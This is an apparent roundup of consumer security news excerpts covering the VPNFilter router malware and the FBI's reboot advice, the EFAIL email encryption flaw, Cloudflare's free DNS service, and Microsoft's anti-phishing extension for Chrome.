Tip: Receiving all of these GDPR/Privacy emails is a great opportunity for you to take an inventory of everybody who has your data and/or personal information.
The FBI is advising users of consumer-grade routers and network-attached storage devices to reboot them as soon as possible to counter Russian-engineered malware that has infected hundreds of thousands devices.
Researchers from Cisco’s Talos security team first disclosed the existence of the malware on Wednesday. The detailed report said the malware infected more than 500,000 devices made by Linksys, Mikrotik, Netgear, QNAP, and TP-Link. Known as VPNFilter, the malware allowed attackers to collect communications, launch attacks on others, and permanently destroy the devices with a single command. The report said the malware was developed by hackers working for an advanced nation, possibly Russia, and advised users of affected router models to perform a factory reset, or at a minimum to reboot.
Later in the day, The Daily Beast reported that VPNFilter was indeed developed by a Russian hacking group, one known by a variety of names, including Sofacy, Fancy Bear, APT 28, and Pawn Storm. The Daily Beast also said the FBI had seized an Internet domain VPNFilter used as a backup means to deliver later stages of the malware to devices that were already infected with the initial stage 1. The seizure meant that the primary and secondary means to deliver stages 2 and 3 had been dismantled, leaving only a third fallback, which relied on attackers sending special packets to each infected device.
The redundant mechanisms for delivering the later stages address a fundamental shortcoming in VPNFilter—stages 2 and 3 can’t survive a reboot, meaning they are wiped clean as soon as a device is restarted. Instead, only stage 1 remains. Presumably, once an infected device reboots, stage 1 will cause it to reach out to the recently seized ToKnowAll.com address. The FBI’s advice to reboot small office and home office routers and NAS devices capitalizes on this limitation. In a statement published Friday, FBI officials suggested that users of all consumer-grade routers, not just those known to be vulnerable to VPNFilter, protect themselves.
This week’s bug of the month is the trendily-named EFAIL.
Like many groovy bugs these days, it’s both a BWAIN (bug with an impressive name) and a BWIVOL (bug with its very own logo, shown in the image at the top of this article).
The name is a pun of sorts on the word “email”, and the bug is caused by a flaw in the specifications set down for two popular standards used for email encryption, namely OpenPGP and S/MIME.
Simply put, the EFAIL vulnerabilities are a pair of security holes that a crook might be able to use to trick recipients of encrypted messages into leaking out some or all of their decrypted content.
Note that this attack only applies if you are using S/MIME or OpenPGP for end-to-end email encryption.
If you aren’t using either of these add-ons in your email client, this vulnerability doesn’t affect you – after all, if the crooks can sniff out your original messages and they’re not encrypted, they’ve got your plaintext already.
Note also that this attack doesn’t work on all messages; it doesn’t work in real time; you need a copy of the original encrypted message; it only works with some email clients; and it pretty much requires both HTML rendering and remote content download turned on in your email client.
Are you looking for a free way to speed up your internet and gain some extra privacy in the process? Keep reading, because Cloudflare (the Web Performance & Security Company) is offering a free new DNS service. And it helped me improve the speed of my DNS lookups.
What is DNS?
DNS is short for Domain Name System. It is an internet protocol that allows user systems to use domain names/URLs to identify a web server rather than inputting the actual IP address of the server. For example, the IP address for Malwarebytes.com is 220.127.116.11, but rather than typing that into your browser, you just type ‘malwarebytes.com’ and your system reaches out to a ‘DNS Server’ which has a list of all domain names and their corresponding IP address, delivering that upon request to the user system. Unfortunately, if a popular DNS server is taken down or in some way disrupted, many users are unable to reach their favorite websites because without the IP address of the web server, your system cannot find the site. When trying to explain the concept of DNS name resolution I think that finding a phone number for a certain person is a good analogy. There are several ways to find a person’s phone number and the same is true for resolving an IP address that belongs to a domain name.
Which DNS servers am I using now?
If you have to ask yourself that question, there’s a big chance that you are using the DNS service provided by your internet provider. And while some of those are quite good, others are deplorable. Those that have looked into changing their DNS servers have probably ended up using Google’s public DNS or if they were also interested in a web-filter they might have ended up using Cisco’s OpenDNS. IMHO those are the two most popular alternatives for the ones provided by ISPs around the globe, but many more are available.
Chrome already provides effective protection against malicious sites: go somewhere with a poor reputation and you’ll get a big, scary red screen telling you that you’re about to do something unwise. But Microsoft believes it can do a better job than Google, and it has released a Chrome plugin, Windows Defender Browser Protection, that brings its own anti-phishing protection to Google’s browser.
Microsoft justifies the new plugin with reference to a 2017 report that claims that the company’s Edge browser blocked 99 percent of phishing attempts, compared to 87 percent by Chrome and 70 percent in Firefox. The plugin brings Edge’s protection to Chrome, so if the theory holds, it should bump the browser up to 99 percent, too.
The new extension doesn’t appear to disable Chrome’s own checking (or at least, it doesn’t seem to be doing so for me), so at the very least isn’t likely to make you less safe, and with phishing being as widespread as it is, the extra protection probably doesn’t hurt.
While making Windows users that extra bit safer is good for the Windows platform as a whole, this release does ever so slightly erode one of the purported benefits of the Edge browser. Microsoft has struggled to get people using its browser—while the core engine and security features are solid, the interface still has frustrating shortcomings—but one of its virtues was that it has different, and arguably better, defense-in-depth protection against phishing and malicious exploitation. In bringing that protection to Chrome, there’s one less reason to pick the Microsoft browser.